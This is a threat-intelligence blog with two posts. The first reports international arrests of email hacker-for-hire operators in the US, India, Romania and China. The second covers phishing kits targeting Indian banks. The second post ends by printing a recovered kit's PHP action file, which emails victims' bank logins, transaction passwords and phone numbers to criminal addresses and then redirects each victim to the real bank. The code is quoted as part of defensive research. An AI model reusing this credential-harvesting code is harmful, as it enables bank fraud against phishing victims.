Unprecedented International Cybercrime Cooperation Nabs Email Hackers

Email Hacking in China, India, Romania

Yesterday we tweeted asking for more information on a statement we found in India's press regarding an email hacker charged in Pune. The article I sited, Pune techie held after FBI alert on hacking racket, reported:

The CBI on Friday arrested a 32-year-old techie from Pune after a tip-off from the Federal Bureau of Investigation (FBI) about a racket involving hacking of 900 e-mail accounts belonging to people from across the world, including Americans and Indians. [...] Following the FBI tip-off, the CBI carried out raids in Ghaziabad, Mumbai and Pune during which several professional hackers were rounded up. Tiwari was arrested and taken on transit remand to Delhi by the CBI team. His computers and other gadgets were seized. According to the CBI, the e-mail accounts of 171 Indians and more than 700 foreign nationals, including Americans, had been hacked. [...] The agency said the raids were part of a coordinated action involving the agencies of China, Romania, the US and India. This was the first time the CBI had tied up with international investigation agencies to launch an operation against cyber crime in India.

We were so pleased to learn of the CBI's Cooperation with the FBI on it's first Cybercrime coordinated effort, but were left puzzling over the statement about coordinated raids in India, Romania, China, and the US.

The confusion was over the fact that the FBI had decided to not unseal the cases in the US related to these crimes until they received confirmation from their peers in India, Romania, and China that the others involved in the case had been successfully arrested. Once that was concluded, we were able to find the original announcement, January 24, 2014, from the US Attorney's Office in the Central District of California, International Law Enforcement Efforts Result in Charges Around the World Against Operators and Customers of E-Mail Hacking Websites.

• Mark Anthony Townsend, 45, of Cedarville Arkansas and
• Joshua Alan Tabor, 29, of Prairie Grove Arkansas were charged with a felony violation for running "needpassword.com". Customers of their service would provide an email account and make payment via PayPal once the email password was obtained. More than 6,000 email accounts were hacked during this scheme.

Three additional US persons were charged, but these were charged with the lesser misdemeanor charges related to hiring a hacker (as opposed to the two above, who did the hacking themselves):
• John Ross Jesensky, 30, of Northridge, California, paid $21,675 to a Chinese website to obtain email account passwords.
• Laith Nona, 31, of Troy, Michigan, paid $1,081 to obtain email account passwords.
• Arthur Drake, 55, of Bronx, New York, paid $1,011 to get email account passwords.

The Romanian DCCO (Direcţiei de Combatere a Criminalităţii Organizate or Directorate for Combating Organized Crime) part of the DIICOT, searched the residences and arrested four individuals associated with the hacker for hire websites:

• zhackgroup.com
• spyhackgroup.com
• rajahackers.com
• clickhack.com
• ghostgroup.org (since at least September 2006!)
• e-mail-hackers.com

Romanian Email hacker, Guccifer

The Romanians report that these individuals broke into at least 1600 email accounts between February 2011 and October 2012.

Based so far only on the coincidence of timing, this blogger believes that this was the notorious "Guccifer" or Marcel Lazar Lehel, who was previously charged with a suspended sentence of three years (February 8, 2012) for hacking into email accounts belonging to SRI director George Maior, former US state secretary Colin Powell, members of Bush and Rockefeller families and officials of the Obama administration. See for example the January 22, 2014 story in Romania's Nine O'Clock news, "Hacker 'Gucifer' caught in Arad" -- www.nineoclock.ro/hacker-“guccifer”-caught-in-arad/. In another story from digi24.ro (via Google Translation) it says:

[In addition to] SRI boss George Major, George Bush, and Colin Powell, Other victims of 'Guccifer' were actor Steve Martin, John Dean, former advisor to President Richard Nixon, actress Mariel Hemingway, three members of the House of Lords in the UK, Laura Manning Johnson, a former CIA analyst, George Roche was Secretary of the Air Force, and President MetLife (insurance company).

. In the earlier charges that resulted in the suspended sentence, Guccifer was charged with accessing and making public photos from the Facebook pages and email accounts of many public officials in Romania as well.

---

Indian Email hacker, Amit Tiwari

The Central Bureau of Investigation in India arrested Amit Tiwari (who had previously been arrested for Credit Card Fraud) for operating the websites www.hirehacker.net and www.anonymiti.com, who hacked at least 935 e-mail accounts between February 2011 and February 2013.

HireHacker's homepage
HireHacker.net was a prolific advertiser of their services since 2007, creating many "blogs" (such as freelancehackers.wordpress.com) and posting questions on places like Yahoo Answers like "Can the Famous Internet Detectives at HireHacker.net really recover my cheating spouses email password?"

---

Chinese Email hacker, Ying Liu

The Ministry of Public Safety in China arrested Ying Liu (劉颖), AKA Brent Liu, for operating the website HireToHack.net. Liu was shown to have broken into at least 300 email accounts between January 2012 and March 2013.

Liu's website had it's fifteen minutes of fame when it was featured in NYMag's story Hiring Hackers is Super Cheap. In that story from January 2012, two Kuwaiti brothers, Bassam Alghanim being the billionaire of the two, hired some Chinese hackers "for the price of a really good dinner" to break into his brother's email account. That story indicated that the hackers earned $200,000 in thirteen months by breaking into accounts. The story was also covered in the Wall Street Journal (which also has a video from Cassell Bryan-Low about the case), where the actual hacking may have been via Invisible Hacking Group instead.

Ying Liu hosted his website, hiretohack.net, on the notorious Malaysian hosting platform, Piradius.net. Here are some screen shots of HireToHack.net that show how their system worked:

Homepage
Menu of Services
Order Placement
This is such an amazing demonstration of international cooperation! I know I already said so, but for India's CBI, China's MPS, Romania's DCCO, and the FBI to cooperate together on a single case is without precedence! A great sign towards a bad future for cyber criminals!

Indian Banks targeted in multi-brand Phishing Attack

Malcovery Security's PhishIQ portal is a fascinating place to explore. This week I did a "Security Year in Review" webinar for an audience of our customers and friends which was so much fun to prepare! (We recorded the webinar for those who missed it - you can watch the recording here: State of Cybersecurity 2013/2014. We reviewed the top security events of 2013, including some of the biggest hacks, the most prominent malware trends, and the successes that our security community - researchers, security companies, and law enforcement - had in responding to these challenges. I also shared my Ten Security Predictions for 2014. I've posted those to the LinkedIn group Enterprise Security Intelligence & Big Data and would love to hear your thoughts on them. Please consider joining our group and the conversation!

Malcovery Security 2014 Prediction #9: Phishing will hit hard in the emerging online banking markets in India and China

This prediction is based on a few things. The criminals in the phishing world are international. Although most phishing victims continue to be in the United States at the present time, the reason for this is the widespread availability of high-speed Internet and the prominence of Online Banking. As China and India, who between them represent 36.5% of the world population, increasingly embrace online banking the criminals of the world will turn their eyes to this population who is now banking online, but who does not have decades of experience with Internet Safety issues leading up to them. I've already received some questions about this prediction, so I thought I would share some feedback on this one by showing some of the visibility we have in PhishIQ to the issue.

The basic work, unfortunately, has already been done for preparing to attack the Indian banks. Phishing kits exist and are in circulation for at least forty Indian banks that we have seen at Malcovery just during the previous month!

e-Police India shared a phishing attack on their website at the beginning of November about a phishing campaign imitating the Reserve Bank of India. In this phishing attack, the spammers have indicated that you need to "Select Your Bank From the List Below to Complete Your OAC Registration Process". Malcovery has seen this kit several times, including for example a live version today on "thedelamere.co.uk".

For each of the icons on the list below, a full corresponding phishing site is offered. For some reason, the "western" banks on the list do NOT go to a phishing site, but provide a link directly to the brand indicated, These "non-phish" (mostly western banks, but some Indian as well) would include Barclays, Citibank, Deutsche Bank, Karnataka Bank, Karur Vysya Bank, Lakshmi Vilas Bank, RBS, Standard Charter, and Tamilnad Mercantile Bank.

(Screen shot of phish on "thedelamere.co.uk")

The same set of phishing files is regularly occurring in our Phishing intelligence system with more than 80 websites having been hacked to host these files.

Because Malcovery is REALLY good at recovering phishing kits, we were able to recover the criminals' email addresses in 15 of the 80 websites. akachi16akachi16@sify.com, akachiugonna@rediffmail.com, and akachiugonna@sify.com were found in 11 of those 15.

In November, the "action file" of these phish sent email to four email addresses, as shown above, and as observed by the investigators at e-Police.in. More recently, the "chizobamyluck@gmail.com" address has been excluded from the kit.

For example, for the phishing site:

The action file was:

<$fromemail = "$ip";
$ip = getenv("REMOTE_ADDR");
$message  = "-----------------+ Andhra Bank Details +-----------------\n";
$message .= "User Id: " .$_POST['user']."\n";
$message .= "Password: " .$_POST['pass1']."\n";
$message .= "Transaction Password: " .$_POST['pass2']."\n";
$message .= "Mobile: " .$_POST['mobile']."\n";
$message .= "Client IP      : $ip\n";
$message .= "-----------------+ Created in 2012 By DON PERO------------------\n";

$recipient = "akachi16akachi16@sify.com, akachiugonna@rediffmail.com, 
akachiugonna@sify.com, chizobamyluck@gmail.com";
$subject = "Andhra $ip";
$headers = "From: admin@gameshack.org";
$headers .= $fromemail."\n";
$headers .= "MIME-Version: 1.0\n";

if (mail($recipient,$subject,$message,$headers)) 
   {     header("Location: http://andhrabank.com");    }else    

    {   echo "ERROR! Please go back and try again.";      }>